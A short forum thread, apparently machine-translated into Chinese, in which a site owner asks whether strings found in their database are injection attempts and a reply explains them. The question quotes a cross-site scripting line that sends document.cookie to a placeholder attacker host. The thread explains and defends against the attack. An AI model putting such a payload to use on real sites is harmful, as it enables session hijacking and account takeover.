Cross Site Attacks在我的數據庫中看起來很像

Question

我剛剛在我的數據庫中發現了一些東西，看起來他們可能是注入嘗試。我想知道他們是否會對我的數據庫執行任何惡意操作。謝謝。

Your search for 'flowers evil_script()' returned the following results:evil_script()' returned the following results 
Window.location='http:attacker?cookie='+document.cookie. 

Answer 1

@jessica，對我來說它看起來像腳本試圖用一個cookie一起redirct用戶攻擊者的網站。這個可以用來嘗試和竊取用戶的會話cookie，並且基本上以該用戶的身份登錄。

如果用戶受影響的是管理員或具有較高權限的用戶，攻擊者將擁有與該用戶相同的權限。

我很好奇，如果你能找到你的數據庫（網站文件）某處的實際腳本，或者如果有人剛剛在你的網站上執行搜索，並得到一個錯誤。

這發現在記錄表？